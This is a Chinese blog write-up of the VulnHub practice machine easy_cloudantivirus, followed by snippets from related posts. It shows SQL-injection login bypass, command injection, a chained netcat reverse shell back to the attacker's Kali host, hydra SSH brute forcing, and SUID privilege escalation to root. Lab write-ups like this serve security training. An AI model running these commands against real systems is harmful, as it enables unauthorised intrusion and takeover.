2、easy_cloudantivirus

最新推荐文章于 2024-08-10 15:48:22 发布
最新推荐文章于 2024-08-10 15:48:22 发布
阅读量645 收藏 12
点赞数 25
分类专栏: vulnhub靶机训练 文章标签: 网络 服务器 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/140406662
版权

参考:打靶第二周-easy_cloudantivirus_cloud anti-virus scanner!-CSDN博客

下载好靶机后直接启动了,我发现这个靶机如果一开始选择我的无线网卡会启动不了,需要先选择一个没有的网卡启动然后关闭后再选择正确的网卡启动就可以了。

老规矩发现一下靶机的IP地址

netdiscover -i eth0 -r 192.168.1.0/24

所以kali 192.168.1.122 靶机 192.168.1.229

探寻开放的端口

nmap -p- 192.168.1.229

查看端口的具体服务

有一个ssh服务和一个8080的web服务,访问这个网站看看。

一个什么反病毒

要求输入一个邀请码,在页面做测试的时候顺便扫描一个目录

在页面输入引号报错了

不过我没有怎么遇到过sqlite数据库和python的网站利用SQL注入的。

扫描目录扫出一个控制台

看到参数是password,可以尝试一下万能密码"or 1=1--+ 这里是"闭合。

这里的意思好像是使用他们的反病毒去扫描文件用来检测有没有病毒应该是,就是扫描的很慢。

这里的漏洞是命令执行,就是这里应该是直接使用命令 scan hello然后将结果返回,所以可以通过scan hello |ls这样尝试是否存在此漏洞

就是不知道为什么这里执行起来好慢。。。

可以看到确实如此,于是可以尝试直接反弹shell,这里看到里面有netcat于是使用nc进行反弹,nc反弹比较简单。

靶机:

        hello ; nc 192.168.1.122 4455

kali:

        nc -lvnp 4455

        又出现了这种情况,就是明明连接上了但是没有回显的情况,看了视频原来是并没有建立一个shell的反弹只是建立了一个连接

        应该使用nc 192.168.1.122 4455 -e /bin/bash 将bash反弹回来才可以

        然后这个靶机这里不可以使用-e指定shell因为nc的版本不支持所以这里使用一个特殊的方式nc串联,我也是第一次清楚这种做法之前可能遇到过但是没有联想到这一块

        命令格式:hello |nc 192.168.1.122 3333 |/bin/bash |nc 192.168.1.122 4444

        需要再kali上面开启3333和4444的监听,会建立两个连接一个用来执行命令一个用来回显命令,可以看到命令的中间有一个bash其实就是3333建立的连接然后在上面执行命令传给bash去执行然后再将结果发给4444的这个连接回显会来。

成功反弹shell后立即查看了一下是不是docker容器里面

我还是习惯于上线msf比较稳定

之前在看目录的时候有个database.sql文件,可以将他下载下来看一看,这里无法直接使用命令查看sql的文件因为这个是sqlite的文件

这个download的好久没用过了都忘记怎么用了。。。这个123.sql是个文件夹

利用sqlite3去dump文件的内容发现有好几个密码

INSERT INTO code VALUES('myinvitecode123');

INSERT INTO code VALUES('mysecondinvitecode');

INSERT INTO code VALUES('cloudavtech');

INSERT INTO code VALUES('mostsecurescanner');

查看靶机中存在哪些用户用密码去尝试登录

cat /etc/passwd

记得看后面有/bin/bash 或者sh 才是可以有终端的

可以找到只有root cloudav scanner 可以登录

使用hydra进行ssh爆破

创建一个user.txt 写入用户名 一个passwd.txt写入密码

hydra -L user.txt -P pass.txt ssh://192.168.1.229

失败了,使用这些密码去尝试之前目录跑出来的console控制台也不是正确的密码

可以思考对应的内核版本和使用msf自带的本地提权进行提权操作

也可以使用常规的suid sudo 等等提权方式,这里使用suid进行查询哪些具有s

常用检查命令

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

已知可用来提权的有

Nmap

Vim

find

Bash

More

Less

Nano

cp

没有看到有这些但是看到一个很奇怪的文件

这个update_cloudav应该是用来更新这个查杀病毒的文件,而且是用下面那个c文件编译过来的,把那个c文件下载看看内容

可以判断是一个可以配合参数的文件

那这就可以使用suid提权的方式了

那我再生成一个elf文件上线,通过老方法将文件上传上去然后赋予执行的权限。

msf那边修改对应的端口后进行run监听然后这边利用update_cloudav去执行命令,记得这里执行的命令要用引号括起来才全是他的参数

不括起来就还是原来的scanner去执行的命令

成功拿到root权限。

另外尝试一下这个内核的版本有没有提权的漏洞啥的

简单尝试两个

好吧试了一圈并没有提权成功的模块

dreamer292
关注
  • 25
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
easys_cloudantivirus
m0_72733529的博客
07-14 790
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub靶 机 ip:192.168.0.156ka li ip:192.168.0.102内容简介:这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权 nmap -p- 192.168.0.156 全端口扫描 nmap -p
熊猫云计算杀毒软件-CloudAntivirus
12-30
一款超好的免费杀毒软件,是最新的云计算的应用。客户端无需耗费多少内存和CPU,服务器承担计算过程。
Vulnhub-easy_cloudantivirus
weixin_46107179的博客
04-01 2841
靶机下载地址:靶机下载 主机发现 通过搭建的靶机环境,可以直接通过arp-scan -l 或者arping来发现主机,得到IP地址后进行信息搜集 信息搜集 通过nmap扫描得到靶机开放了22、8080端口,并且web服务是Werkzeug httpd 0.14.1 (Python 2.7.15rc1) 既然是web服务,通过浏览器打开看到说需要邀请码,可能是需要什么密码什么的 渗透攻击 这里可以有两种攻击手段,一种是SQL注入,可以使用" or 1=1 --+绕过,另外一种是暴力破解,我这里使用bur
vulnhub-easy_cloudantivirus
qq_41810304的博客
06-01 631
前言: 做这个靶机隔了很长时间,因为在搞毕业设计以及找工作,现在只能说论文告一段落,只剩答辩和ppt了,就接着把这个做完,下载地址也不想找了,总体而言该靶机比较简单。最后,求答辩老师放过我吧。 Kali:192.168.1.4 目标机:192.168.1.31 信息收集: 漏洞挖掘: 从信息来看,开放ssh和网站端口,并且该网站是Python写的。可以爆破22端口,一般来说还是从网站下手,在我看来爆破密码依然是最后手段。先访问8080端口。 一般这个界面没有思路的话就是看看页面源码有没
0x02-easy_cloudantivirus
rec09er的博客
04-12 1030
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
打靶笔记--easys_cloudantivirus
2301_77315080的博客
04-22 634
打靶笔记--easys_cloudantivirus
最新EXCEL宏病毒 杀毒软件
12-19
2. **VBA宏**:VBA宏是Microsoft Office套件中的一种编程接口,允许用户编写自定义功能来自动化任务。宏病毒就是利用了VBA宏的这一特性,编写恶意代码,然后隐藏在合法的文档中。 3. **Startup(潘1006.xls)**:这...
VulnHub靶机-easy_cloudantivirus 打靶
rumil的博客
04-12 838
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
打靶第二周-easy_cloudantivirus
wcwdnmdnmd的博客
09-14 1814
easy_cloudantivirus靶机地址攻击手段所用工具开始攻击主机发现sql注入 靶机地址 easy_cloudantivirus 攻击手段 端口扫描 WEB侦查 SQL注入 命令注入 密码爆破 代码审计 NC串联 本地提权 所用工具 arping nmap 开始攻击 主机发现 使用arping来发现 因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段 也可使用nmap 192.168.
kali之vulhub,easycloudantivirus
weixin_54431413的博客
05-07 431
一、靶机描述 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录网址 六、利用远程命令执行漏洞与kali建立连接 七、提权 八、利用suid提取
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 570
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
(一)easy_cloudantivirus靶机渗透练习
qq_69746732的博客
01-04 1001
easy_cloudantivirus靶机渗透练习
easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2157
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
深度解密CRLF注入与重定向漏洞:从原理到实践
2301_80064376的博客
08-08 889
重定向漏洞(Open Redirect)是一种安全漏洞,攻击者可以利用它将用户从受信任的网站重定向到恶意网站。这种漏洞通常出现在网站处理 URL 参数时,没有对用户输入进行适当验证。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 366
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
OSPF小实验
sgdhshshhs的博客
08-07 399
【代码】OSPF小实验。
mpls vpn基础实验
最新发布
wudongfang666的专栏
08-10 379
场景:异地两个站点通过mpls vpn骨干网络实现安全通讯虚拟路由转发 VRF ,相当于在设备内建立一条虚拟通道,一个vpn的实例(vrf)可以简单的理解为一台虚拟设备。拓扑图。
杭州等保测评的基础概念
weixin_62641226的博客
08-07 202
该系统共划分为五个等级,每个等级都有不同的安全需求,目的是针对不同敏感程度的信息建立相应的防护机制。在杭州这块“土地”上,“等保”测评既是防范数据泄漏和黑客攻击的“挡箭牌”,也是对企业信用的“试金石”,推动营商环境的优化,助力“数字经济”的繁荣发展。🚀等级保护测评,又称“等保测评”,是杭州这座创新型城市建设的一道重要基础,它既是一个合规要求,也是数字生态系统的捍卫者。借着“智慧城市”的东风,让我们一起揭开“等保测评”的神秘面纱,为建设一个更安全、更可靠的数字化社会作出贡献。
48天笔试训练错题——day44
ミカミミミ博客
08-08 815
48天笔试训练错题——day44.
48天笔试训练错题——day43
ミカミミミ博客
08-07 883
48天笔试训练错题——day43.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值